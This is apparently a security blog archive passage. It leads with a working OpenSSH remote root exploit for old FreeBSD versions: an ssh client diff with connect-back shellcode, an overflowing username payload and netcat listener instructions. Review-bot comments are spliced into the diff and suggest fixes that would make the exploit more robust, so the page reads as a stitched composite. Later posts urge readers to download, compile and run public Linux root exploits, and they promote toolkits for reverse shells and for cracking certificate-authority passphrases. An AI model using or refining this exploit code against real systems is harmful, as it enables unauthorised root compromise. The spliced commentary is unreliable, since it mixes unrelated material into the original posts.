
OpenSSH FreeBSD Remote Root Exploit
By Kingcope

Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
run like ./ssh -1 -z
setup a netcat, port 443 on yourip first

A statically linked Linux binary of the exploit can be found below; attached is a diff to openssh-5.8p2. The statically linked binary can be downloaded from http://isowarez.de/ssh_0day

I know these versions are really old; some seem to run them, though.

-Cheers, King “the archaeologist” Cope

diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c
149a150
> char *myip;
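Review bot: char *myip; is a file-scope tentative definition with no declaration in any header, so its only consumer (sshconnect1.c) has to redeclare it with extern by hand; a one-line comment saying it holds the connect-back IP given with -z would save the next reader a grep, and a shared declaration would let the compiler catch a type mismatch between the two files.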
195a197,203
> "OpenSSH FreeBSD Remote Root Exploit\n"
> "By Kingcope\n"
> "Year 2011\n\n"
> "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n"
> "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n"
> "run like ./ssh -1 -z \n"
> "setup a netcat, port 443 on yourip first\n\n"
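Review bot: the usage text prints "run like ./ssh -1 -z" without the operand that -z actually takes (the connect-back IP), so anyone following it verbatim gets getopt's "option requires an argument" error; show the argument in the string. The same seven lines are printed a second time from sshconnect1.c, so keep the banner in one place.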
299c307
< while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:p:qstvx"
---
> while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:z:p:qstvx"
335a344,346
> break;
> case 'z':
> myip = optarg;
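Review bot: case 'z': myip = optarg; stores the pointer but nothing ever checks that -z was given; with the option omitted, myip stays NULL and is later passed to inet_addr() and printf("%s"), which crashes the client instead of printing a usage error. Add a check after the getopt loop, e.g. if (myip == NULL) usage();.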
diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
667a668,719
> //IP=\xc0\xa8\x20\x80
> #define IPADDR "\xc0\xa8\x20\x80"
> #define PORT "\x27\x10" /* htons(10000) */
>
> char sc[] =
> "\x90\x90"
> "\x90\x90"
> "\x31\xc9" // xor ecx, ecx
> "\xf7\xe1" // mul ecx
> "\x51" // push ecx
> "\x41" // inc ecx
> "\x51" // push ecx
> "\x41" // inc ecx
> "\x51" // push ecx
> "\x51" // push ecx
> "\xb0\x61" // mov al, 97
> "\xcd\x80" // int 80h
> "\x89\xc3" // mov ebx, eax
> "\x68"IPADDR // push dword 0101017fh
> "\x66\x68"PORT // push word 4135
> "\x66\x51" // push cx
> "\x89\xe6" // mov esi, esp
> "\xb2\x10" // mov dl, 16
> "\x52" // push edx
> "\x56" // push esi
> "\x50" // push eax
> "\x50" // push eax
> "\xb0\x62" // mov al, 98
> "\xcd\x80" // int 80h
> "\x41" // inc ecx
> "\xb0\x5a" // mov al, 90
> "\x49" // dec ecx
> "\x51" // push ecx
> "\x53" // push ebx
> "\x53" // push ebx
> "\xcd\x80" // int 80h
> "\x41" // inc ecx
> "\xe2\xf5" // loop -10
> "\x51" // push ecx
> "\x68\x2f\x2f\x73\x68" // push dword 68732f2fh
> "\x68\x2f\x62\x69\x6e" // push dword 6e69622fh
> "\x89\xe3" // mov ebx, esp
> "\x51" // push ecx
> "\x54" // push esp
> "\x53" // push ebx
> "\x53" // push ebx
> "\xb0\xc4\x34\xff"
> "\xcd\x80"; // int 80h
>
>
> extern char *myip;
>
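Review bot: the inline comments on the shellcode no longer match the bytes: "\x68"IPADDR is annotated "push dword 0101017fh" (127.1.1.1) although IPADDR is 192.168.32.128; PORT is defined as htons(10000) while its comment "push word 4135" describes the same two bytes read in host order (0x1027), which is confusing next to the define; and "\xb0\xc4\x34\xff" (mov al, 0xc4; xor al, 0xff, leaving al = 0x3b, the FreeBSD execve syscall number) has no comment at all. Both macros are only placeholders, since the code in the next hunk overwrites them at sc + 21 and sc + 27 at runtime; say so here, and note that those offsets are tied to the four leading NOPs and must be recomputed if the prologue changes.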
678a731,748
>
> char buffer[100000];
>
> printf("OpenSSH Remote Root Exploit\n");
> printf("By Kingcope\n");
> printf("Year 2011\n\n");
> printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n");
> printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n");
> printf("Connect back to: %s:443\n", myip);
>
> *((unsigned long*)(sc + 21)) = inet_addr(myip);
> *((unsigned short*)(sc + 27)) = htons(443);
>
> memset(buffer, 'V', 8096);
> memcpy(buffer+24, "\x6b\x4b\x0c\x08", 4); // SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
> memset(buffer+28, '\x90', 65535);
> memcpy(buffer+28+65535, sc, sizeof(sc));
> server_user=buffer;
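Review bot: memcpy(buffer+24, "\x6b\x4b\x0c\x08", 4) hard-codes a single return address (0x080c4b6b), and its own comment ties it to the FreeBSD-20020702 build, yet the banner printed just above claims both 20020702 and 20030924 are "unlocked" and the server banner is never checked; either key a second address on the banner or drop the second line from the claim. The result of inet_addr(myip) is also stored without checking for INADDR_NONE, so a mistyped IP silently becomes a connect-back to 255.255.255.255, and char buffer[100000] is a roughly 100 KB automatic array in an ssh_userauth1 frame that would be safer as static.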

 

1 Jul 2011

OpenSSH 3.5p1 Remote Root Exploit for FreeBSD

By IPSECS Admin. Posted in News | No Comments »

OpenSSH 3.5p1 Remote Root Exploit for FreeBSD
Discovered and Exploited By Kingcope – 2011

The last two days I have been investigating a vulnerability in OpenSSH affecting at least FreeBSD 4.9 and 4.11. These FreeBSD versions run OpenSSH 3.5p1 in the default install.  The sshd banner for 4.11-RELEASE is:
"SSH-1.99-OpenSSH_3.5p1 FreeBSD-20060930".

A working remote exploit which spawns a root shell remotely and prior to authentication was developed.  The bug can be triggered both through ssh version 1 and ssh version 2 using a modified ssh client. During the investigation of the vulnerability it was found that the bug resides in the source code file “auth2-pam-freebsd.c”.

http://www.freebsd.org/cgi/cvsweb.cgi/src/crypto/openssh/Attic/auth2-pam-freebsd.c

This file does not exist in FreeBSD releases greater than 5.2.1. The last commit is from 7 years ago.  Specifically the bug follows a code path in the PAM Authentication Thread inside this source code, “pam_thread()”. It could not be verified if the bug is inside this (third party, freebsd) OpenSSH code or in the FreeBSD pam library itself.

Both the challenge response (ssh version 1) and keyboard interactive via pam (ssh version 2) authentications go through this code path.  By supplying a long username to the daemon the sshd crashes.

h4x# sysctl kern.sugid_coredump=1
kern.sugid_coredump: 0 -> 1
root@debian:~# ssh -l`perl -e 'print "A" x 100'` 192.168.32.138
h4x# tail -1 /var/log/messages
Jun 30 16:01:25 h4x /kernel: pid 160 (sshd), uid 0: exited on signal 11 (core dumped)

Looking into the coredump reveals:

h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0  0x28092305 in ?? ()
(gdb) x/1i $eip
0x28092305:     (bad)

The sshd crashes at a place with illegal instructions. It looks like it depends on how the sshd is started. Starting the sshd from the console as root and running the ssh client with a long username again reveals:

Read more »

 

from: http://lists.grok.org.uk/pipermail/full-disclosure/2011-April/080031.html

BSD derived RFC3173 IPComp encapsulation will expand arbitrarily nested payload
-------------------------------------------------------------------------------

Gruezi, this document describes CVE-2011-1547.

RFC3173 ip payload compression, henceforth ipcomp, is a protocol intended to provide compression of ip datagrams, and is commonly used alongside IPSec (although there is no requirement to do so).

An ipcomp datagram consists of an ip header with ip->ip_p set to 108, followed by a 32 bit ipcomp header, described in C syntax below.

struct ipcomp {
    uint8_t  comp_nxt;   // Next Header
    uint8_t  comp_flags; // Reserved
    uint16_t comp_cpi;   // Compression Parameter Index
};

The Compression Parameter Index indicates which compression algorithm was used to compress the ipcomp payload, which is expanded and then routed as requested. Although the CPI field is 16 bits wide, in reality only 1 algorithm is widely implemented, RFC1951 DEFLATE (cpi=2).

It’s well documented that ipcomp can be used to traverse perimeter filtering, however this document discusses potential implementation flaws observed in popular stacks.

The IPComp implementation originating from NetBSD/KAME implements injection of unpacked payloads like so:

algo = ipcomp_algorithm_lookup(cpi);

/* … */

error = (*algo->decompress)(m, m->m_next, &newlen);

/* … */

if (nxt != IPPROTO_DONE) {
    if ((inetsw[ip_protox[nxt]].pr_flags & PR_LASTHDR) != 0 &&
        ipsec4_in_reject(m, NULL)) {
        IPSEC_STATINC(IPSEC_STAT_IN_POLVIO);
        goto fail;
    }
    (*inetsw[ip_protox[nxt]].pr_input)(m, off, nxt);
} else
    m_freem(m);

/* … */

Where inetsw[] contains definitions for supported protocols, and nxt is a protocol number, usually associated with ip->ip_p (see
http://www.iana.org/assignments/protocol-numbers/protocol-numbers.xml), but in this case from ipcomp->comp_nxt. m is the mbuf structure adjusted to point to the unpacked payload.

The unpacked packet is dispatched to the appropriate protocol handler directly from the ipcomp protocol handler. This recursive implementation fails to check for stack overflow, and is therefore vulnerable to a remote pre-authentication kernel memory corruption vulnerability.

The NetBSD/KAME network stack is used as basis for various other operating systems, such as Xnu, FTOS, various embedded devices and network appliances, and earlier versions of FreeBSD/OpenBSD (the code has since been refactored, but see the NOTES section regarding IPComp quines, which still permit remote, pre-authentication, single-packet, spoofed-source DoS in the latest versions).

The Xnu port of this code is close to the original, where the decompressed payload is recursively injected back into the toplevel ip dispatcher. The implementation is otherwise similar, and some alterations to the testcase provided for NetBSD should make it work. This is left as an exercise for the interested reader.
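The following is an added example, not code from the advisory above or from any BSD, Xnu or KAME tree. It is a user-space model of the dispatch loop the advisory describes: an IPComp header whose comp_nxt is again 108 is decompressed and handed straight back to the IPComp handler, so a hand-built datagram nested N deep recurses N times, and the only thing that stops it is the bound the original code lacks. To keep it self-contained the "compressed" data is a raw DEFLATE stream made only of stored blocks (RFC 1951, BTYPE=00), which is enough to build the nested datagram without zlib; a real stack would call a full inflater. MAX_NEST, IPPROTO_TCP_NUM, ipcomp_wrap(), dispatch() and nested_depth() are illustrative names chosen here, and the inner payload is constructed.

```c
/*
 * Added example: user-space model of recursive IPComp decapsulation with the
 * missing nesting bound.  Assumes DEFLATE stored blocks only (no zlib); the
 * constants and function names below are illustrative, not from any kernel.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IPPROTO_IPCOMP  108     /* ip->ip_p / comp_nxt value for IPComp (RFC 3173) */
#define IPPROTO_TCP_NUM 6       /* an arbitrary inner protocol for the demo */
#define CPI_DEFLATE     2       /* well-known CPI for DEFLATE */
#define MAX_NEST        4       /* assumed bound: the check the KAME code lacks */

struct ipcomp {
    uint8_t  comp_nxt;          /* Next Header */
    uint8_t  comp_flags;        /* Reserved */
    uint16_t comp_cpi;          /* Compression Parameter Index, network order */
};

/* Inflate a raw DEFLATE stream that consists only of stored blocks.
 * Returns the number of output bytes, or -1 on malformed input. */
static int inflate_stored(const uint8_t *in, size_t inlen, uint8_t *out, size_t outcap)
{
    size_t ip = 0, op = 0;
    for (;;) {
        if (ip >= inlen)
            return -1;
        uint8_t hdr = in[ip++];
        int bfinal = hdr & 1;
        int btype = (hdr >> 1) & 3;
        if (btype != 0 || ip + 4 > inlen)       /* only stored blocks are modelled */
            return -1;
        uint16_t len  = (uint16_t)(in[ip]     | (in[ip + 1] << 8));
        uint16_t nlen = (uint16_t)(in[ip + 2] | (in[ip + 3] << 8));
        ip += 4;
        if ((uint16_t)~len != nlen || ip + len > inlen || op + len > outcap)
            return -1;                          /* LEN/NLEN mismatch or truncation */
        memcpy(out + op, in + ip, len);
        ip += len;
        op += len;
        if (bfinal)
            return (int)op;
    }
}

/* Hand a decapsulated payload to its protocol handler, like the pr_input()
 * call in the advisory.  depth counts IPComp layers already peeled.  With
 * bound == 0 the recursion is unbounded (the vulnerable shape); with
 * bound != 0 nesting beyond MAX_NEST is rejected.  Returns the depth at
 * which a non-IPComp protocol was reached, or -1 on rejection/error. */
static int dispatch(const uint8_t *pkt, size_t len, uint8_t proto, int depth, int bound)
{
    if (proto != IPPROTO_IPCOMP)
        return depth;                           /* inner protocol: stop recursing */
    if (bound && depth >= MAX_NEST)
        return -1;                              /* hardened: refuse further nesting */
    if (len < sizeof(struct ipcomp))
        return -1;
    struct ipcomp h;
    memcpy(&h, pkt, sizeof h);
    uint16_t cpi = (uint16_t)((pkt[2] << 8) | pkt[3]);   /* comp_cpi is big-endian */
    if (cpi != CPI_DEFLATE)
        return -1;                              /* unknown algorithm: drop */
    uint8_t inner[2048];
    int n = inflate_stored(pkt + sizeof h, len - sizeof h, inner, sizeof inner);
    if (n < 0)
        return -1;
    return dispatch(inner, (size_t)n, h.comp_nxt, depth + 1, bound);
}

/* Wrap a payload in one IPComp layer: 4-byte header plus one stored DEFLATE
 * block.  Returns the encapsulated length. */
static size_t ipcomp_wrap(const uint8_t *payload, size_t plen, uint8_t nxt, uint8_t *out)
{
    out[0] = nxt;
    out[1] = 0;
    out[2] = 0;
    out[3] = CPI_DEFLATE;                       /* CPI 2 in network byte order */
    out[4] = 1;                                 /* BFINAL=1, BTYPE=00 (stored) */
    out[5] = (uint8_t)(plen & 0xff);            /* LEN, little-endian */
    out[6] = (uint8_t)(plen >> 8);
    out[7] = (uint8_t)(~plen & 0xff);           /* NLEN = one's complement of LEN */
    out[8] = (uint8_t)((~plen >> 8) & 0xff);
    memcpy(out + 9, payload, plen);
    return 9 + plen;
}

/* Build `layers` nested IPComp layers around a constructed 8-byte payload and
 * run the result through the dispatcher.  Returns the depth reached, or -1
 * when the bound (if enabled) rejected the datagram. */
int nested_depth(int layers, int bound)
{
    uint8_t bufa[4096], bufb[4096];
    uint8_t *cur = bufa, *next = bufb;
    size_t len = 8;
    uint8_t proto = IPPROTO_TCP_NUM;
    memcpy(cur, "TCPDATA!", 8);                 /* constructed inner payload */
    for (int i = 0; i < layers; i++) {
        len = ipcomp_wrap(cur, len, proto, next);
        proto = IPPROTO_IPCOMP;                 /* outer header now says "IPComp again" */
        uint8_t *t = cur; cur = next; next = t;
    }
    return dispatch(cur, len, proto, 0, bound);
}

int main(void)
{
    printf("3 layers, unbounded:  depth %d\n", nested_depth(3, 0));
    printf("12 layers, unbounded: depth %d\n", nested_depth(12, 0));
    printf("12 layers, bounded:   %d (rejected)\n", nested_depth(12, 1));
    return 0;
}
```

The model recurses once per layer exactly as the kernel dispatcher does, so the unbounded path can be driven as deep as the caller's stack allows, which is the advisory's point; the bounded path stops at MAX_NEST regardless of how many layers were built. The depth check sits where a real fix has to go, in the decapsulation handler before the payload is re-dispatched, rather than in the inflater, since the inflater sees each layer as a perfectly valid stream.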

Read more »

 

People have talked a great deal about how to hack networks, but do they remember data communication models? Do they know how large the scope of network hacking is, or do they only know ARP spoofing, DNS poisoning and denial of service? To understand the (nearly) complete process of network hacking, they have to understand a data communication model such as the DoD (TCP/IP) model or the more commonly used OSI model.

By understanding the OSI model, knowing the technologies that sit at each OSI layer, and defining the vulnerabilities that can occur at each layer, they will know how many technologies have to be assessed on a network and which of them may carry a vulnerability. This presentation tries to explain network hacking from its basics, starting from the OSI model. You can read it here!

 

As promised, this time we are releasing the Grid Toolkit, which can be used to perform penetration tests against grid computing infrastructure. It has been almost two years since we released our paper on grid computing [in]security in 2008. The paper covers:

  • Introduction to grid computing
  • Grid computing scanning and enumeration
  • Exploiting network and transport layer weaknesses related to grid security
  • Exploiting DNS to break the trust between grid infrastructure nodes
  • Exploiting web-based grid computing portals
  • Cracking the certificate authority pass phrase
  • Exploiting headnode trust relationships using an XML file

Some of these points can be exploited with existing network security tools; the others are supported by Grid Toolkit. Grid Toolkit is written in Python and needs some additional modules to be installed:

  • goto, used by the grid toolkit core program
  • ClientForm, used for grid portal login guessing
  • Paramiko, used for certificate authority cracking

Grid Toolkit supports:

  • Scanning and enumerating grid infrastructure
  • Guessing logins for GridSphere, a web-based grid portal
  • Cracking the pass phrase of a certificate authority private key file
  • Exploiting headnode trust relationships using an XML file

More documentation on how to install and use this tool will be available soon, so keep in touch with IPSECS. You can download Grid Toolkit from gridtoolkit.sourceforge.net or read the Python source code on core.ipsecs.com!

 

24 May 2010

IPv6 Hackit – The IPv6 Army Knife

By IPSECS Admin. Posted in Exploitation, News | 1 Comment »

IPv6 is the Internet protocol of the future and is rich in security features, but hackers keep researching it and trying to exploit it. Day by day, papers and presentations explaining how to defeat this protocol are published. Van Hauser of The Hacker's Choice (THC) released his IPv6 attack toolkit for exploiting IPv6 protocol weaknesses; his tools can be freely downloaded from the THC website. HD Moore, author of the Metasploit project, wrote the paper "Exploiting Tomorrow's Internet Today: Penetration testing with IPv6", which can be read on http://uninformed.org. His paper explains how to exploit IPv6 applications by proxying/relaying via IPv4.

IPSECS has unofficially released its IPv6 Hackit on SourceForge, together with a paper that explains IPv6 exploitation almost completely. The paper covers:

  • Introduction to IPv6
  • Connecting to the IPv6 backbone (IPv6-in-IPv4 tunneling using TSP)
  • An introduction to IPv6 socket programming
  • IPv6 discovery and scanning (via ICMP, TCP, DNS)
  • Writing IPv6 remote exploits and shellcode (stack-based buffer overflow, format string)
  • IPv6 protocol vulnerabilities (man in the middle, denial of service)

You can freely download the paper, written in Indonesian, from core.ipsecs.com. IPSECS wrote IPv6 Hackit in Perl, so the tool does not need to be compiled, but it does need some Perl modules to be installed:

  • strict
  • warnings
  • Switch
  • English
  • Net::DNS
  • POSIX
  • Getopt::Long
  • LWP::UserAgent
  • HTTP::Message
  • IO::Socket::INET6

The tool supports:

  • Host enumeration, finding which hosts are up or down.
  • TCP port scanning, finding which ports are open or closed.
  • Googling from a Unix shell to find possible IPv6 domains.
  • Finding AAAA (IPv6 host) records for a single domain or a mass-collected list of domains.
  • Getting a shell from an IPv6 bind shellcode/payload.
  • Getting a shell from an IPv6 reverse shellcode/payload.
  • Exploiting simple IPv6 application weaknesses (this module is still under development)
  • An IPv6 bind backdoor with authentication (this module is still under development)

You can easily download IPv6 Hackit from ipv6hackit.sourceforge.net. While you play with this tool and read the paper, we are developing the grid toolkit, to be released soon. So follow and watch this website; IPSECS only gives out the best stuff to play with! Enjoy!

 

Can you imagine Indonesia's Internet core routing being shut down? Nobody could read their email, open Facebook or search Google. Can you imagine Indonesian Internet banking stopping for a while, or ATMs no longer responding to your requests? That is only the lowest risk when core routing is compromised.

Can you imagine your confidential data being sniffed without anyone noticing? Can you imagine your username and password being stolen? Not a big deal? Then imagine your banking transactions being intercepted and modified; that is the real fear in the digital world. This paper explains how these problems are possible and shows how weak our Indonesian core routing infrastructure is. Check it out!

 

3 Dec 2009

Another FreeBSD Root Exploit Leaked!

By IPSECS Admin. Posted in Exploitation | No Comments »

The latest version of FreeBSD has been found to be vulnerable. The vulnerability is in the run-time link editor (rtld), which can be tricked into accepting LD_* environment variables even for set-uid/set-gid binaries. You can see the flaw by analyzing the exploit.

With this leaked exploit, more than 10 exploitable vulnerabilities have been leaked to the public this year (2009)! So is FreeBSD really as secure as people say?!

 

2 Sep 2009

All Linux Kernel Are Targeted

By IPSECS Admin. Posted in Exploitation | No Comments »

Yes, it's true: sock_sendpage() was found to be vulnerable by Tavis Ormandy and Julien Tinnes. The function suffers from a NULL pointer dereference that can be exploited to escalate privileges to root. Most Linux kernels are reported to be vulnerable. Exploits for this flaw have been developed and spread freely on the Internet, and they can be used to bypass security restrictions such as SELinux.

http://milw0rm.com/exploits/9435 – the first exploit, written by spender of grsecurity
http://milw0rm.com/exploits/9436 – another exploit, taken from www.frasunek.com
http://milw0rm.com/exploits/9479 – another exploit, from p0c73n1
http://milw0rm.com/exploits/9545 – another exploit, written by Ramon de Carvalho Valle of Rise Security

Download the exploit, compile and execute! BOOM, it's root! Finally, this post is a little bit late :D .

 

22 Jul 2009

PulseAudio Owns My Ubuntu Intrepid

By IPSECS Admin. Posted in Exploitation | No Comments »

It was just fun to try exploiting PulseAudio to gain root privileges; my Ubuntu Intrepid is indeed exploitable.

Searching further, I found an exploit that attacks the RHEL family with SELinux enabled here. So is Linux really more secure than Windows? What makes Linux more secure is the people behind the machine: many Linux administrators are much more skilled than Windows ones.

 

9 Jun 2009

Distributed Password Cracking

By IPSECS Admin. Posted in Exploitation, Presentation | No Comments »

Distributed password cracking uses several computers to speed up the cracking process. It usually relies on computer clusters and software that supports parallel computing. Some known software for parallel cracking on clusters:

  • John the Ripper and Condor: John works as the password cracker while Condor works as the scheduler that parallelizes the cracking process and distributes it across the cluster.
  • John the Ripper and Djohn: John works as the password cracker while Djohn is the client-server application that parallelizes the cracking process and distributes it across the cluster.
  • Medussa, a password cracker originally designed for parallel cracking. It contains a client-server application to parallelize the cracking process and distribute it across the cluster.
  • John the Ripper with the MPI patch: John built with MPI. MPI is the de facto standard for parallel programming and is implemented by several packages, e.g. OpenMPI, MPICH and LAM/MPI.

Our presentation describes how to do parallel cracking with John the Ripper and the MPI patch. We used 15 dual-core computers and LAM/MPI to distribute the cracking process. Download our presentation here.

 

3 Jun 2009

Global Trend Attack

By IPSECS Admin. Posted in Exploitation, Presentation | No Comments »

The complete title is “global trend attack in local network”; this is my presentation at Telkom RDC Bandung in late 2007. It is old but still good enough to show which threats may disturb your network. Download my presentation here.

The presentation explains the top 6 flaws commonly exploited in local networks:

  • Spoofing: ARP spoofing, IP spoofing, DHCP spoofing and DNS spoofing are commonly exploited.
  • Man in the middle: using spoofing techniques to place an attacker between two hosts.
  • Sniffing: combining man in the middle with some tricks to passively intercept communication on the local network.
  • TCP/IP hijacking: active sniffing and modification of traffic to take over an established TCP/IP connection.
  • Remote code execution: using application flaws to exploit local network infrastructure. Buffer overflows and format strings are the most commonly exploited flaws in local networks.
  • Denial of service: the most powerful denial of service (DoS) comes from the local network.

The presentation also covers ways to defend against these attacks and minimize security risks.

 

17 May 2009

Grid Computing Hacking

By IPSECS Admin. Posted in Exploitation, News | No Comments »

Introduction

Grid computing is a relatively new technology that has been known since the 1990s. The idea was brought together by Ian Foster, Carl Kesselman and Steve Tuecke, widely regarded as the “fathers of the grid”. Grid computing is defined as a group of computation nodes that work together in distributed computing. You can find some grid projects in the Wikipedia article here.

Each node in a grid has a computer cluster to perform high-performance computing through parallel computation. A computer cluster consists of a headnode (master) and some computational nodes (slaves). The headnode is responsible for communicating with the other headnodes in the grid, managing computation resources and scheduling computation jobs on the slaves. We do not want to explain in detail how a computer cluster works; in this article our interest is grid computing and why it is vulnerable to some hacking exploitation.

How Grid Works

Grid computing is really complex inside, so the chance of it being exploited is really big. Grid computing needs good network connectivity, many TCP/IP services, encryption, parallel programming and web services. A cluster headnode trusts another headnode because a valid Certificate Authority (CA) is installed on both; the CA installed on a headnode is called the Host CA. TCP/IP services are needed on the headnode to send or receive data and execute jobs between two or more headnodes. Two services on the headnode are needed for headnode-to-headnode communication: first the GridFTP service, responsible for data transfer between two or more headnodes, and second the Web Service Container, responsible for receiving jobs from users. Both services can be activated by installing the Globus Toolkit, the de facto standard open source software for grids.

Read more »

 

15 May 2009

Is This End of Linux Kernel?

By IPSECS Admin. Posted in News | No Comments »

I just looked around on milw0rm today, searching for Linux kernel exploits, and luckily found four new ones.

  • The first exploit attacks the Linux kernel locally using the exit_notify() function vulnerability. This flaw affects Linux kernels before 2.6.29 (most of them). Take a look here for the proof of concept.
  • The second exploit attacks the Linux kernel locally through a udev vulnerability. udev before 1.4.1 is reported not to verify whether a NETLINK message originates from kernel space, which allows local users to gain root privileges by sending a NETLINK message from user space. Take a look here and here for the proof of concept.
  • The third exploit attacks the Linux kernel remotely using SCTP FWD-TSN chunk memory corruption. Some people said this bug was not exploitable until sgrakkyu gave his explanation. sgrakkyu's explanation can be read here; take a look here for the proof of concept. This flaw affects most Linux kernels.
  • The fourth exploit attacks the Linux kernel locally using the ptrace_attach() function vulnerability. This flaw affects Linux kernel version 2.6.29. Take a look here and here for the proof of concept.

Now I just wonder which is more secure by default, “Linux or Windows??”, when even OpenBSD, claimed to be the most secure operating system, has stupid bugs inside its code.

             

Introduction

802.1x is an IEEE standard for port-based (well, we would rather say interface-based) end-user authentication on LANs. While it supports (and was initially designed for) Ethernet, the main current use of 802.1x is wireless user authentication as part of the wireless security scheme provided by the 802.11i security standard. The 802.1x authentication chain consists of three elements:

• Supplicant: an end-user station, often a laptop, that runs 802.1x client software.
• Authenticator: a switch, a wireless gateway or an access point to which the authenticating users connect. It must be configured to support 802.1x on the involved interfaces with commands like aaa authentication dot1x default group radius (global configuration) and dot1x port-control auto (switch interface).
• Authentication server: a RADIUS server to which authenticators forward end users' authentication requests for verification and an authentication decision.

EAP-LEAP Basics

The Extensible Authentication Protocol (EAP) is used by all three 802.1x component types to communicate with each other. It is extensible because many different EAP types exist for all kinds of authentication schemes, for example employing SIM cards, tokens, certificates and more traditional passwords. Here we are interested only in Cisco-related protocols and products, so the security weaknesses of EAP-LEAP are the target of the discussion.

Read more »